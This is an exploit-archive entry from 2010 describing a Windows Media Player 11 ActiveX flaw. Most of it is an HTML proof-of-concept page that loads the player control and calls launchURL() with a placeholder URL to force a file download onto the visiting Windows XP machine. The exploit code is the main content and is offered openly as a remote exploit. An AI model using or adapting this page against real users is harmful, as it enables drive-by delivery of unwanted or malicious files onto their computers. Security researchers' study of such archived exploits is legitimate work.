Windows Media Player 11 ActiveX launchURL() files download

2010-01-17T00:00:00
ID 1337DAY-ID-10128
Type zdt
Reporter Jacky
Modified 2010-01-17T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ==========================================================
Windows Media Player 11 ActiveX launchURL() files download
==========================================================

<!-------
This is a vulnerability into Windows Media Player ActiveX launchURL() function
which someone can download what ever file into the vulnerable machine !!!
Discovered and written by Jacky!
 
Tested version: 11.0.5358.4827
Tested machine: Windows XP SP3 & Windows XP SP2
--------->
<html>
<body>
<object id='test' classid='clsid:{6BF52A52-394A-11d3-B153-00C04F79FAA6}'></object>
<script>
arg1='http://<BLAH BLAH BLAH FILE>';
test.launchURL(arg1);
</script>
</body>
</html>



#  0day.today [2018-01-01]  #